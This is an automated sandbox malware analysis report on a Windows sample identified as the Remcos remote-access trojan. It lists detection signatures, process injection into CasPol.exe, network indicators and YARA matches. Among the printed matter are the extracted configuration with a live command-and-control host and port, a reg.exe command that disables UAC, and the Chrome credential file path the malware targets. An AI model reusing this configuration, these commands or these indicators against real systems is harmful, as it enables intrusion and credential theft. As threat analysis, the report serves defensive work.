Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
C1ZsNxSer8.exe

Overview

General Information

Sample name:C1ZsNxSer8.exe
renamed because original name is a hash value
Original sample name:4fb3e6e7b8f9c12cd2d5e161f7b94760.exe
Analysis ID:1482895
MD5:4fb3e6e7b8f9c12cd2d5e161f7b94760
SHA1:57bdad62c6ea7f1b905c900302f918d185811a94
SHA256:f76f9b85df2ba8850bec058164d2c752c8fd8ef0f1bcffd793e5f453d8a839bb
Tags:64exetrojan
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Contains functionality to bypass UAC (CMSTPLUA)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Injects a PE file into a foreign processes
Writes to foreign memory regions
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • C1ZsNxSer8.exe (PID: 3432 cmdline: "C:\Users\user\Desktop\C1ZsNxSer8.exe" MD5: 4FB3E6E7B8F9C12CD2D5E161F7B94760)
    • conhost.exe (PID: 6000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • CasPol.exe (PID: 6780 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "unifrieghtmovers.com:2558:1", "Assigned name": "Gasplant", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "chrome-E2SMAR", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
      00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
      • 0x6c4a8:$a1: Remcos restarted by watchdog!
      • 0x6ca20:$a3: %02i:%02i:%02i:%03i
      00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmpREMCOS_RAT_variantsunknownunknown
      • 0x664fc:$str_a1: C:\Windows\System32\cmd.exe
      • 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
      • 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
      • 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
      • 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
      • 0x6656c:$str_b2: Executing file:
      • 0x675ec:$str_b3: GetDirectListeningPort
      • 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
      • 0x67118:$str_b7: \update.vbs
      • 0x66594:$str_b9: Downloaded file:
      • 0x66580:$str_b10: Downloading file:
      • 0x66624:$str_b12: Failed to upload file:
      • 0x675b4:$str_b13: StartForward
      • 0x675d4:$str_b14: StopForward
      • 0x67070:$str_b15: fso.DeleteFile "
      • 0x67004:$str_b16: On Error Resume Next
      • 0x670a0:$str_b17: fso.DeleteFolder "
      • 0x66614:$str_b18: Uploaded file:
      • 0x665d4:$str_b19: Unable to delete:
      • 0x67038:$str_b20: while fso.FileExists("
      • 0x66ab1:$str_c0: [Firefox StoredLogins not found]
      00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmpINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
      • 0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
      • 0x6637c:$s1: CoGetObject
      • 0x66390:$s1: CoGetObject
      • 0x663ac:$s1: CoGetObject
      • 0x70338:$s1: CoGetObject
      • 0x6633c:$s2: Elevation:Administrator!new:
      Click to see the 10 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.2.C1ZsNxSer8.exe.145bfbc3ae0.0.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
        1.2.C1ZsNxSer8.exe.145bfbc3ae0.0.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
          1.2.C1ZsNxSer8.exe.145bfbc3ae0.0.unpackWindows_Trojan_Remcos_b296e965unknownunknown
          • 0x690a8:$a1: Remcos restarted by watchdog!
          • 0x69620:$a3: %02i:%02i:%02i:%03i
          1.2.C1ZsNxSer8.exe.145bfbc3ae0.0.unpackREMCOS_RAT_variantsunknownunknown
          • 0x630fc:$str_a1: C:\Windows\System32\cmd.exe
          • 0x63078:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
          • 0x63078:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
          • 0x63578:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
          • 0x63da8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
          • 0x6316c:$str_b2: Executing file:
          • 0x641ec:$str_b3: GetDirectListeningPort
          • 0x63b98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
          • 0x63d18:$str_b7: \update.vbs
          • 0x63194:$str_b9: Downloaded file:
          • 0x63180:$str_b10: Downloading file:
          • 0x63224:$str_b12: Failed to upload file:
          • 0x641b4:$str_b13: StartForward
          • 0x641d4:$str_b14: StopForward
          • 0x63c70:$str_b15: fso.DeleteFile "
          • 0x63c04:$str_b16: On Error Resume Next
          • 0x63ca0:$str_b17: fso.DeleteFolder "
          • 0x63214:$str_b18: Uploaded file:
          • 0x631d4:$str_b19: Unable to delete:
          • 0x63c38:$str_b20: while fso.FileExists("
          • 0x636b1:$str_c0: [Firefox StoredLogins not found]
          1.2.C1ZsNxSer8.exe.145bfbc3ae0.0.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
          • 0x62fe8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
          • 0x62f7c:$s1: CoGetObject
          • 0x62f90:$s1: CoGetObject
          • 0x62fac:$s1: CoGetObject
          • 0x6cf38:$s1: CoGetObject
          • 0x62f3c:$s2: Elevation:Administrator!new:
          Click to see the 24 entries

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          No Snort rule has matched

          Suricata Signatures

          Timestamp:2024-07-26T10:38:04.959198+0200
          SID:2036594
          Source Port:49701
          Destination Port:2558
          Protocol:TCP
          Classtype:Malware Command and Control Activity Detected
          Timestamp:2024-07-26T10:39:05.833265+0200
          SID:2022930
          Source Port:443
          Destination Port:49708
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:2024-07-26T10:38:06.927784+0200
          SID:2803304
          Source Port:49702
          Destination Port:80
          Protocol:TCP
          Classtype:Unknown Traffic
          Timestamp:2024-07-26T10:38:24.330685+0200
          SID:2022930
          Source Port:443
          Destination Port:49703
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Found malware configuration
          Source: 00000006.00000002.3736494218.0000000000F77000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "unifrieghtmovers.com:2558:1", "Assigned name": "Gasplant", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "chrome-E2SMAR", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
          Multi AV Scanner detection for submitted file
          Source: C1ZsNxSer8.exeReversingLabs: Detection: 23%
          Yara detected Remcos RAT
          Source: Yara matchFile source: 1.2.C1ZsNxSer8.exe.145bfbc3ae0.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.C1ZsNxSer8.exe.145bf964228.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.C1ZsNxSer8.exe.145bfbc3ae0.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.C1ZsNxSer8.exe.145bf964228.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.3736494218.0000000000F77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1270156855.00000145BF964000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: C1ZsNxSer8.exe PID: 3432, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 6780, type: MEMORYSTR
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00433837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,6_2_00433837
          Source: C1ZsNxSer8.exe, 00000001.00000002.1270156855.00000145BF964000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_8ee8cf23-d

          Exploits

          barindex
          Yara detected UAC Bypass using CMSTP
          Source: Yara matchFile source: 1.2.C1ZsNxSer8.exe.145bfbc3ae0.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.C1ZsNxSer8.exe.145bf964228.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.C1ZsNxSer8.exe.145bfbc3ae0.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.C1ZsNxSer8.exe.145bf964228.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1270156855.00000145BF964000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: C1ZsNxSer8.exe PID: 3432, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 6780, type: MEMORYSTR

          Privilege Escalation

          barindex
          Contains functionality to bypass UAC (CMSTPLUA)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_004074FD _wcslen,CoGetObject,6_2_004074FD
          Source: C1ZsNxSer8.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,6_2_00409253
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,6_2_0041C291
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,6_2_0040C34D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,6_2_00409665
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_0044E879 FindFirstFileExA,6_2_0044E879
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,6_2_0040880C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_0040783C FindFirstFileW,FindNextFileW,6_2_0040783C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,6_2_00419AF5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,6_2_0040BB30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,6_2_0040BD37
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,6_2_00407C97

          Networking

          barindex
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: unifrieghtmovers.com
          Source: global trafficTCP traffic: 192.168.2.7:49701 -> 23.95.60.82:2558
          Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
          Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
          Source: Joe Sandbox ViewIP Address: 23.95.60.82 23.95.60.82
          Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_0041B380 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,6_2_0041B380
          Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
          Source: global trafficDNS traffic detected: DNS query: unifrieghtmovers.com
          Source: global trafficDNS traffic detected: DNS query: geoplugin.net
          Source: CasPol.exe, CasPol.exe, 00000006.00000002.3738453046.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000006.00000002.3738453046.0000000000FB4000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000006.00000002.3738453046.0000000000FC8000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000006.00000002.3736494218.0000000000F77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
          Source: CasPol.exe, 00000006.00000002.3738453046.0000000000FB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp-
          Source: C1ZsNxSer8.exe, 00000001.00000002.1270156855.00000145BF964000.00000004.00001000.00020000.00000000.sdmp, CasPol.exe, 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
          Source: CasPol.exe, 00000006.00000002.3736494218.0000000000F77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpSystem32
          Source: CasPol.exe, 00000006.00000002.3738453046.0000000000FB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpl
          Source: C1ZsNxSer8.exeString found in binary or memory: https://aka.ms/GlobalizationInvariantMode
          Source: C1ZsNxSer8.exeString found in binary or memory: https://aka.ms/nativeaot-c
          Source: C1ZsNxSer8.exeString found in binary or memory: https://aka.ms/nativeaot-compatibility
          Source: C1ZsNxSer8.exe, 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/nativeaot-compatibilityX
          Source: C1ZsNxSer8.exeString found in binary or memory: https://aka.ms/nativeaot-compatibilityY
          Source: C1ZsNxSer8.exeString found in binary or memory: https://aka.ms/nativeaot-compatibilityy

          Key, Mouse, Clipboard, Microphone and Screen Capturing

          barindex
          Contains functionality to register a low level keyboard hook
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_0040A2B8 SetWindowsHookExA 0000000D,0040A2A4,000000006_2_0040A2B8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,6_2_0040B70E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_004168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,6_2_004168C1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,6_2_0040B70E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_0040A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,6_2_0040A3E0

          E-Banking Fraud

          barindex
          Yara detected Remcos RAT
          Source: Yara matchFile source: 1.2.C1ZsNxSer8.exe.145bfbc3ae0.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.C1ZsNxSer8.exe.145bf964228.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.C1ZsNxSer8.exe.145bfbc3ae0.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.C1ZsNxSer8.exe.145bf964228.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.3736494218.0000000000F77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1270156855.00000145BF964000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: C1ZsNxSer8.exe PID: 3432, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 6780, type: MEMORYSTR

          Spam, unwanted Advertisements and Ransom Demands

          barindex
          Contains functionalty to change the wallpaper
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_0041C9E2 SystemParametersInfoW,6_2_0041C9E2

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 1.2.C1ZsNxSer8.exe.145bfbc3ae0.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: 1.2.C1ZsNxSer8.exe.145bfbc3ae0.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
          Source: 1.2.C1ZsNxSer8.exe.145bfbc3ae0.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
          Source: 6.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: 6.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
          Source: 6.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
          Source: 6.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: 6.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
          Source: 6.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
          Source: 1.2.C1ZsNxSer8.exe.145bf964228.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: 1.2.C1ZsNxSer8.exe.145bf964228.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
          Source: 1.2.C1ZsNxSer8.exe.145bf964228.2.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
          Source: 1.2.C1ZsNxSer8.exe.145bfbc3ae0.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: 1.2.C1ZsNxSer8.exe.145bfbc3ae0.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
          Source: 1.2.C1ZsNxSer8.exe.145bfbc3ae0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
          Source: 1.2.C1ZsNxSer8.exe.145bf964228.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: 1.2.C1ZsNxSer8.exe.145bf964228.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
          Source: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
          Source: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
          Source: 00000001.00000002.1270156855.00000145BF964000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: Process Memory Space: C1ZsNxSer8.exe PID: 3432, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: Process Memory Space: CasPol.exe PID: 6780, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess Stats: CPU usage > 49%
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_004167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress,6_2_004167B4
          Source: C:\Users\user\Desktop\C1ZsNxSer8.exeCode function: 1_2_00007FF774A307501_2_00007FF774A30750
          Source: C:\Users\user\Desktop\C1ZsNxSer8.exeCode function: 1_2_00007FF774A191401_2_00007FF774A19140
          Source: C:\Users\user\Desktop\C1ZsNxSer8.exeCode function: 1_2_00007FF774A2C3501_2_00007FF774A2C350
          Source: C:\Users\user\Desktop\C1ZsNxSer8.exeCode function: 1_2_00007FF774A2ED001_2_00007FF774A2ED00
          Source: C:\Users\user\Desktop\C1ZsNxSer8.exeCode function: 1_2_00007FF774A2F5501_2_00007FF774A2F550
          Source: C:\Users\user\Desktop\C1ZsNxSer8.exeCode function: 1_2_00007FF774A2DE201_2_00007FF774A2DE20
          Source: C:\Users\user\Desktop\C1ZsNxSer8.exeCode function: 1_2_00007FF774A337F01_2_00007FF774A337F0
          Source: C:\Users\user\Desktop\C1ZsNxSer8.exeCode function: 1_2_00007FF774A28F301_2_00007FF774A28F30
          Source: C:\Users\user\Desktop\C1ZsNxSer8.exeCode function: 1_2_00007FF774A1FF901_2_00007FF774A1FF90
          Source: C:\Users\user\Desktop\C1ZsNxSer8.exeCode function: 1_2_00007FF774A080B01_2_00007FF774A080B0
          Source: C:\Users\user\Desktop\C1ZsNxSer8.exeCode function: 1_2_00007FF774A139101_2_00007FF774A13910
          Source: C:\Users\user\Desktop\C1ZsNxSer8.exeCode function: 1_2_00007FF774A328F01_2_00007FF774A328F0
          Source: C:\Users\user\Desktop\C1ZsNxSer8.exeCode function: 1_2_00007FF774A319F01_2_00007FF774A319F0
          Source: C:\Users\user\Desktop\C1ZsNxSer8.exeCode function: 1_2_00007FF774A1F9E41_2_00007FF774A1F9E4
          Source: C:\Users\user\Desktop\C1ZsNxSer8.exeCode function: 1_2_00007FF774AB41601_2_00007FF774AB4160
          Source: C:\Users\user\Desktop\C1ZsNxSer8.exeCode function: 1_2_00007FF774A341601_2_00007FF774A34160
          Source: C:\Users\user\Desktop\C1ZsNxSer8.exeCode function: 1_2_00007FF774A28AB01_2_00007FF774A28AB0
          Source: C:\Users\user\Desktop\C1ZsNxSer8.exeCode function: 1_2_00007FF774A38BC01_2_00007FF774A38BC0
          Source: C:\Users\user\Desktop\C1ZsNxSer8.exeCode function: 1_2_00007FF774A16BB61_2_00007FF774A16BB6
          Source: C:\Users\user\Desktop\C1ZsNxSer8.exeCode function: 1_2_00007FF774A1E4E01_2_00007FF774A1E4E0
          Source: C:\Users\user\Desktop\C1ZsNxSer8.exeCode function: 1_2_00007FF774A12C501_2_00007FF774A12C50
          Source: C:\Users\user\Desktop\C1ZsNxSer8.exeCode function: 1_2_00007FF774A324801_2_00007FF774A32480
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_0043E0CC6_2_0043E0CC
